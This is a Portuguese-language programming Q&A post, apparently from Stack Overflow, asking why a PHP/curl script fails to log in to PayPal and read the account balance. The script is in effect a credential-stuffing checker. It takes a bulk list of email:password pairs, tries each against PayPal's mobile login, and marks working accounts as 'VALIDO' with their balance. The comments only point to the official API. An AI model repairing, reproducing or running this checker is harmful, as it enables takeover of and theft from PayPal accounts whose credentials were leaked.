# Login no Paypal

Tags: php, libcurl

Estou tentando logar no Paypal e pegar o valor do saldo da conta, mas sem sucesso.

Meu código:

```
<?php
include ("curl.php");
$fp=fopen("fpaypal","w");
fwrite($fp, "");
fclose($fp);
$curl = new curl;
if(isset($_POST['txt']))
{
        $logins=array_values(array_unique(explode("\n",stripslashes($_POST['txt']))));
        foreach($logins as $login)
        {
                flush();
                $fp=fopen("fpaypal","w");
                fwrite($fp, "");
                fclose($fp);
                list($email,$senha)=explode(":",$login);
                $email = trim(str_replace(Array("\n", "\r"), "",$email));
                $senha = trim(str_replace(Array("\n", "\r"), "",$senha));
                $curl->open("GET", "https://mobile.paypal.com/pt-br/cgi-bin/wapapp?cmd=_sm");
                $curl->cookie_file = 'fpaypal';
                $curl->exec();
                preg_match('/CONTEXT=(.+?)\&amp;SESSION=(.+?)\&amp;/i',$curl->responseText,$context);
                $curl->open("GET", "https://mobile.paypal.com/br/cgi-bin/wapapp?cmd=_flow&CONTEXT={$context[1]}&SESSION={$context[2]}&view_balance.x=");
                $curl->cookie_file = 'fpaypal';
                $curl->exec();
                preg_match('/name="CONTEXT" value="(.+?)"/i',$curl->responseText, $CONTEXT);
                preg_match('/name="Entrar" action="(.+?)"/i',$curl->responseText,$ACT);
                $ACT=str_replace("amp;", "",$ACT[1]);
                preg_match('/dispatch=(.+?)\"/i',$curl->responseText,$dispatch);
                $curl->open("POST",  $ACT);
                $curl->referer = "https://mobile.paypal.com/br/cgi-bin/wapapp?cmd=_flow&CONTEXT={$context[1]}&SESSION={$context[2]}&view_balance.x=";
                $curl->postData = "CONTEXT={$CONTEXT[1]}&login_email=".rawurlencode(utf8_encode($email))."&login_password=".rawurlencode(utf8_encode($senha))."&login.x=Entrar";
                $curl->cookie_file = 'fpaypal';
                $curl->exec();

                if(preg_match('/<\/h4>.+?([0-9.,]+)/i',$curl->responseText,$saldo)&&!preg_match('/method="post" name="Entrar"/i',$curl->responseText))
                {
                        flush();
                        echo "$email:$senha - <font color=green>VALIDO</font> - Possui saldo de $".$saldo[1]."<br/>";
                }
                else
                {
                        flush();
                        echo "$email - <font color=red>INVALIDO</font><br/>";
                }
                ob_flush();
                flush();
        }
}
else
{
        echo "<form method=POST>
        <center>
        Logins:Senha: <br/>
        <textarea name='txt' cols=53 rows=16>login:senha
login:senha</textarea><br>
        <input type=submit value=Testar!>
        </form></center>";
}
?>
```

Comment: Porque você não utiliza a [API do Paypal](https://www.paypal-brasil.com.br/desenvolvedores/documentos-e-apis/)? Tem a documentação dela em português também. Tenho certeza que desta forma você conseguirá a conexão com sucesso.

Comment: Nunca usei a [API do PayPal](https://developer.paypal.com/), e como não possuo uma conta no PayPal nem ao menos sei se o código funciona. Acredito que quando você ver este [este exemplo](https://devtools-paypal.com/guide/openid/php?interactive=ON&env=sandbox) que usa [esta classe](https://github.com/paypal/sdk-core-php) será capaz de desenvolver seu próprio código para autenticação. Desculpe não poder ajudá-lo da maneira que queria.

Comment: Ola, recomendo que você utilize a API brasileira, porque dependendo do que exatamente você pretende fazer com esse fluxo, talvez ele não funcione no Brasil, porque algumas ferramentas desenvolvidas pelo o PayPal, ainda não estão disponível no Brasil. Talvez se você explicar melhor, qual tipo de fluxo de pagamento você esta tentando utilizar, fica mais fácil em te ajudar.